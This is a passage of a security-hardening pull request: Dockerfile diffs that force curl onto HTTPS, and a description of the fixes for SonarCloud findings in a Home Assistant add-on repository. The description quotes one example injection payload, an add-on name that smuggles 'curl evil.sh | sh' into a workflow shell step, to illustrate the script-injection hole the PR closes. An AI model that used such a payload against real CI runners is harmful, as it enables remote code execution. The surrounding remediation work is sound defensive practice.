+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/stirling-pdf/Dockerfile
+++ b/stirling-pdf/Dockerfile
@@ -41,20 +41,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/uptime-kuma/Dockerfile
+++ b/uptime-kuma/Dockerfile
@@ -42,20 +42,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/whisper-cpp/Dockerfile
+++ b/whisper-cpp/Dockerfile
@@ -73,20 +73,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \


### PR DESCRIPTION
## Summary

Clears every open SonarCloud finding on `main`. Two of the four ratings were already **A** (Reliability, 0 bugs; Maintainability, 0.3% debt ratio). The other two were **E**:

| Rating | Before | Driver |
|---|---|---|
| Security | **E** | 122 vulnerabilities |
| Security Review | **E** | 14 hotspots, 0% reviewed |

Security Review is a *ratio* of hotspots reviewed, so partially fixing it changes nothing — 2 unaddressed hotspots out of 2 remaining is still 0%. All 14 had to go.

## Vulnerabilities (122 → 0)

**`docker:S6506` × 115 and `githubactions:S6506` × 3 — HTTPS not enforced on downloads.** Every `curl` in all 19 add-on `Dockerfile`s and the three `yq` downloads now pass `--proto '=https' --proto-redir '=https'`, restricting both the initial request and every redirect hop to HTTPS.

> The workflow downloads previously used `wget --https-only`, added in #20. That does block the downgrade in practice — verified: it still fetches a valid 14 MB `ELF x86-64` binary through GitHub's redirect chain — but the analysis of `main` at `02:31:54`, which included that change, still flagged all three lines. The rule does not recognise the flag. They are now `curl`, consistent with the `Dockerfile`s.

**`githubactions:S7630` × 2 (BLOCKER) — script injection.** `inputs.addon` is supplied by whoever triggers a `workflow_dispatch` and was interpolated straight into the `detect-changes` shell script, so an add-on name like `x"; curl evil.sh | sh; #` executed as code on the runner. Every context value that step reads now passes through `env:` and is dereferenced as a shell variable, where it can only be data.

**`docker:S8541` + `docker:S8544` — unpinned, non-binary `pip` install.** `pdm` is pinned to `2.28.2` and installed with `--only-binary :all:`, so the build neither drifts to whatever is newest nor executes a source distribution's `setup.py`.

## Hotspots (14 → 0)

**`githubactions:S7637` × 10 — unpinned action references.** All 15 `uses:` entries (7 third-party actions, 3 reusable workflows, each appearing once or more) are pinned to full commit SHAs with the version in a trailing comment.

A pin with nothing to advance it is just a stale dependency, so this adds `.github/dependabot.yaml` with the `github-actions` ecosystem on a weekly schedule — Dependabot bumps SHA pins and rewrites the version comment.

**`githubactions:S7635` × 2 — over-broad secrets.** `claude.yaml` and `claude-code-review.yaml` used `secrets: inherit`, handing workflows in another repository every secret this one holds. They now pass only `CLAUDE_CODE_OAUTH_TOKEN`, the single secret those workflows declare as required.

**`python:S5332` — hardcoded HTTP endpoint.** `HA_URL` defaulted to `http://homeassistant.local:8123`, which both hardcoded an unencrypted endpoint and, when unset, silently sent requests — bearer token included — to a guessed host. It is now required.

**`docker:S6470` — glob `COPY`.** `COPY pyproject.toml pdm.lock* ./` copied whatever else matched at build time; `pdm.lock` is now named explicitly.

## Breaking change

**`HA_URL` no longer defaults to `http://homeassistant.local:8123`** and must be set explicitly; a missing value raises `ValueError: HA_URL environment variable must be set`.

The **add-on is unaffected** — its `run` script always exports `HA_URL` from `config.yaml`, so the Python default was dead code on that path. Direct users of the MCP server must set it, which `.docs/SETUP.md` and `config_example.json` already instruct. Recorded in `mcp-server-extended/CHANGELOG.md`.

## Deliberately not changed

`build.yaml` still uses `secrets: inherit` for its call to the **local** `_build-addon.yaml`. SonarCloud does not flag it — the rule targets cross-repository calls — and the only secret consumed is `GITHUB_TOKEN`, which is passed to called workflows automatically. Removing it would be a small least-privilege win, but the `docker/login-action` step that would prove it is skipped on `pull_request`, so a regression would not surface until after merge. Left as a follow-up rather than shipped unverified.

## Test plan

- [ ] All 19 add-ons build across every architecture (the `Dockerfile` and workflow changes rebuild everything)
- [ ] `yq` still installs in `detect-changes`, `manifest`, and all build jobs — the `curl` swap touches every job
- [ ] SonarCloud reports 0 vulnerabilities and 0 hotspots; Security and Security Review reach **A**
- [ ] Quality gate passes

## Notes

- `CHANGELOG.md` is untouched; entries are chlog fragments under `.changes/unreleased/`.
- `CLAUDE.md` and `.github/copilot-instructions.md` record the four new invariants so they survive future edits.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
